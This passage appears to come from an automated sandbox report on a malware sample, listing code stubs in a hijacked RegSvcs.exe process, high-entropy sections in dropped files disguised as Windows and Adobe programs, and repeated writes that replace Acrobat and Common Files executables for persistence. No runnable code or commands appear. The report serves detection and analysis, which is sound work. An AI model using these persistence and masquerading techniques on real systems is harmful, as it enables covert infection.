              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B0F7 push 0040B124h; ret 8_2_0040B11C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B0F8 push 0040B124h; ret 8_2_0040B11C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408080 push 004080B8h; ret 8_2_004080B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408158 push 00408196h; ret 8_2_0040818E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408970 push 004089E4h; ret 8_2_004089DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00408994 push 004089E4h; ret 8_2_004089DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_004089AC push 004089E4h; ret 8_2_004089DC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00415208 push 0041528Ch; ret 8_2_00415284
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040CA0C push 0040CA3Ch; ret 8_2_0040CA34
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040CA10 push 0040CA3Ch; ret 8_2_0040CA34
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00417AEC push 00417B18h; ret 8_2_00417B10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00404BC0 push 00404C11h; ret 8_2_00404C09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040D3C0 push 0040D3ECh; ret 8_2_0040D3E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040A3E4 push 0040A410h; ret 8_2_0040A408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040C390 push 0040C3C0h; ret 8_2_0040C3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040C394 push 0040C3C0h; ret 8_2_0040C3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040A3AC push 0040A3D8h; ret 8_2_0040A3D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040DC44 push 0040DCA3h; ret 8_2_0040DC9B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040DC0C push 0040DC38h; ret 8_2_0040DC30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B41E push 0040B44Ch; ret 8_2_0040B444
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040B420 push 0040B44Ch; ret 8_2_0040B444
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0040A438 push 0040A464h; ret 8_2_0040A45C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041A4F4 push 0041A51Ah; ret 8_2_0041A512
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00414C80 push 00414CACh; ret 8_2_00414CA4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00409488 push 004094B8h; ret 8_2_004094B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0041A4AC push 0041A4E8h; ret 8_2_0041A4E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00418CB8 push 00418CE8h; ret 8_2_00418CE0
              Source: MUH030425.exeStatic PE information: section name: .text entropy: 7.534764441197317
              Source: wBBaygjR.exe.0.drStatic PE information: section name: .text entropy: 7.534764441197317
              Source: AcroCEF.exe.8.drStatic PE information: section name: .reloc entropy: 7.937527790890744
              Source: SingleClientServicesUpdater.exe.8.drStatic PE information: section name: .reloc entropy: 7.9436649035088
              Source: AppVClient.exe.8.drStatic PE information: section name: .reloc entropy: 7.93647422561389
              Source: FXSSVC.exe.8.drStatic PE information: section name: .reloc entropy: 7.942225948690676
              Source: elevation_service.exe.8.drStatic PE information: section name: .reloc entropy: 7.943894441876406
              Source: elevation_service.exe0.8.drStatic PE information: section name: .reloc entropy: 7.9459114175596905
              Source: SensorDataService.exe.8.drStatic PE information: section name: .reloc entropy: 7.935330315340683
              Source: Spectrum.exe.8.drStatic PE information: section name: .reloc entropy: 7.945394677194669
              Source: AgentService.exe.8.drStatic PE information: section name: .reloc entropy: 7.937062731850421
              Source: vds.exe.8.drStatic PE information: section name: .reloc entropy: 7.941021905795259
              Source: VSSVC.exe.8.drStatic PE information: section name: .reloc entropy: 7.939475605270115
              Source: wbengine.exe.8.drStatic PE information: section name: .reloc entropy: 7.941244565932592
              Source: wmpnetwk.exe.8.drStatic PE information: section name: .reloc entropy: 7.946563616718318
              Source: SearchIndexer.exe.8.drStatic PE information: section name: .reloc entropy: 7.94581358190456

              Persistence and Installation Behavior

              barindex
              Creates files in the system32 config directory
              Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\eab56394c76d7db5.bin
              Drops executable to a common third party application directory
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
              Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
